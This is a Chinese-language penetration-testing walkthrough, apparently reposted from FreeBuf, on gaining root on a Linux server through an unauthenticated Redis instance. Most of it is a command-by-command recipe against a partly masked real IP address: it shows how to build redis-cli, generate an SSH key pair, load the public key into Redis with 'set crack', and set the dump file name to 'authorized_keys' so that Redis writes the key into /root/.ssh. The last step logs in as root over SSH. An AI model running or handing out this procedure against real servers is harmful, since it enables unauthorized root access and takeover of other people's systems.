redis未授权访问配合ssh免密登录getshell – 作者:掌控安全l吴天良

在一次渗透测试中拿到一个ip地址52.80.249.xx,nmap端口扫描出22,6379,80端口,目标机是linux系统的一台服务器,6379为redis的默认端口,尝试对其进行利用。使用kali作为攻击机

一、环境准备

1.1、在攻击机上面下载redis

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

1614738932_603ef5f4db7e9c76a2947.png!small

1.2解压文件,执行文件

解压文件:tar xzf redis-2.8.17.tar.gz

进入redis目录:cd redis-2.8.17

安装:make1614738958_603ef60e19d1d32a09efd.png!small

1.3、进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下(这样以后启动redis就不用进入安装目录了)

cd src

cp redis-server /usr/bin

cp redis-cli /usr/bin

1614739063_603ef6772006fbef19778.png!small

1.4、、返回目录redis-2.8.17,将redis.conf拷贝到/etc/目录下

cd ../

cp redis.conf /etc/1614739077_603ef685548d1fa8bfa46.png!small

1.5、使用/etc/目录下的reids.conf文件中的配置启动redis服务:

redis-server /etc/redis.conf

1614739424_603ef7e08ff3f92e85f5b.png!small

1.6、然后ctrl+c退出,再次进入src目录然后连接目标靶机的redis服务

ctrl+c

cd src

redis-cli –h 52.80.249.xx

1614739756_603ef92c0434eaac3ef08.png!small

出现52.80.249.xx:6379>就代表连接成功,并且没有输入密码

二、漏洞利用

2.1、这里附上一个这里没法利用的一种 攻击方式截图(没有测试仅供参考)

1614739550_603ef85e32ce4bdb4d4b0.png!small

2.2、我们这里是不知道路径的,根据前期信息收集知道还有ssh服务的22端口是开放的,可以利用“公私钥”认证获取root权限

使用ssh生成公钥和私钥文件

ssh-keygen -t rsa

1614739600_603ef8909949dfe6413a6.png!small

2.3、进入.ssh文件下,将上面生成的公钥保存到1.txt里面

cd /root/.ssh

(echo -e “\n\n”;cat id_rsa.pub; echo -e “\n\n”) > 1.txt

1614739641_603ef8b92216f55ce53b7.png!small

2.4、将生成的公钥文件通过redis上传到目标服务器

cat 1.txt | redis-cli -h 52.80.249.xx -x set crack

1614739723_603ef90b19b25bf4db07b.png!small

2.5、远程连接redis服务

redis-cli -h 52.80.249.xx

1614739697_603ef8f135cb6f755ddce.png!small

2.6、获得redis备份的路径

config get dir 1614739787_603ef94bb8b73f6b2017f.png!small

2.7、更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):

1614739813_603ef9651e5cd9bcb38f1.png!small

2.8、设置上传公钥的备份文件名字为authorized_keys:

config set dbfilename authorized_keys

1614739828_603ef974e47752fad8eee.png!small

2.9、检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出,至此成功写入ssh公钥到靶机

config get dbfilename

1614739853_603ef98dccee19aa1fbfa.png!small

2.10、攻击机直接ssh连接目标服务器

ssh -i id_rsa [email protected]

1614739915_603ef9cb86ad2042651b1.png!small

来源:freebuf.com 2021-03-03 10:56:56 by: 掌控安全l吴天良

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论